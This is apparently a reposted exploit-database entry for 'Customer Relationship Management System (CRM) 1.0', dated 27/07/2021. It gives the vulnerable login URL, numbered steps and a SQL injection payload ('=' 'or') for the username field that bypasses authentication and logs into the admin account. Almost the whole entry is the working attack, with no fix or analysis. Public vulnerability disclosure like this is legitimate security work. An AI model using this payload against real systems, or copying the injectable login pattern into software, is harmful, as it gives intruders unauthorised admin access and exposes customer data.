Customer Relationship Management System (CRM) 1.0 – Sql Injection Authentication Bypass

  • 作者: Shafique_Wasta
    日期: 2021-07-27
  • 类别:
  • 来源:
  • # Exploit Title: Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass
    # Date: 27/07/2021
    # Exploit Author: Shafique_Wasta
    # Vendor Homepage:
    # Software Link:
    # Version: 1
    # Tested on: Windows 10/xampp
    # Customer relationship management system is vulnerable to Sql Injection Auth Bypass
    # Exploit Working:
    # 1. Visit on localhostcrm/customer/login.php
    # 2. You will see the login panel
    # 3. use this payload ( '=' 'or' ) in username and click on signin you will login into the admin account.
    # Vulnerable URL :http://localhost/crm/customer/login.php
    # Payload: '=' 'or'